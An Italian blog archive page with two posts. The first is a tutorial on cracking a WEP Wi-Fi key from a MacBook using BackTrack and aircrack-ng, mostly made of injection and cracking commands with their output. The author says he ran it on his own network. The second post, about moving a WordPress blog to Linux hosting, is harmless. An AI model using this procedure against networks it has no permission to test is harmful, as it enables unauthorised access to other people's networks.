logo

Archive for Linux

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro


Aruba, hosting windows o linux?

pc_indwww.gif

Per il mio primo sito avevo comprato un dominio su Aruba con Hosting Windows che sopperiva in modo egregio alla mia esigenza di dover creare un’area protetta con un minimo di sicurezza ottenuta con i modelli di Front Page forniti  da Aruba.

Per il secondo sito “www.maxpalmari.t” ho optato per la stessa soluzione, tutto OK fino a quando ho deciso di creare un Blog, ed ecco sorgere i primi problemi.

Installo wordpress come da manuale e subito mi arriva la mail di conferma con user e password.

Cerco subito di personalizzare l’Aspetto del Blog tramite l’editor dei temi, apporto le modifiche, salvo….e ed ecco il primo Allert che mi avvisa che c’è qualcosa che non va.

Non mi arrendo, scarico la pagina sul Mac, la modifico e la pubblico.

Poi installo un certo numero di Plugin tra cui ImageManager, provo subito le potenzialità del programma (ben recensite su altri blog) e di nuovo il server mi avverte che non ho i permessi per scrivere!!

Ma allora mi sorge un dubbio, sono o non sono il proprietario del Dominio?

Controllo i permessi sulle cartelle, tutto bene sono io  “666“.

Indago un pò sulla rete e scopro che l’Hosting Windows non mi concede tutti i diritti necessari per il corretto funzionamento di WordPress (forse nella cartella “Pubblic”?).

Dopo due assennati  giorni di prove ed indagini, finalmente trovo la soluzione :

aggiungere, per soli 10€ , un Hosting Linux a quello Windows e, come vedete dall’indirizzo (lnx.maxpalmari.it/blog), tutto funziona perfettamente.

Per reinstallare il blog ho semplicemente:

– esportato tutti i miei articoli sul PC (dal pannello “Gestione” tramite “Esporta”),

– reindirizzato il mio dominio dal server Windows a quello LINUX,

– reinstallo wordpress su server Linux,

– importato il file.XML con tutti i miei dati (dal Pannello “Gestione”, “Importa”)

 ed eccomi di nuovo ON LINE.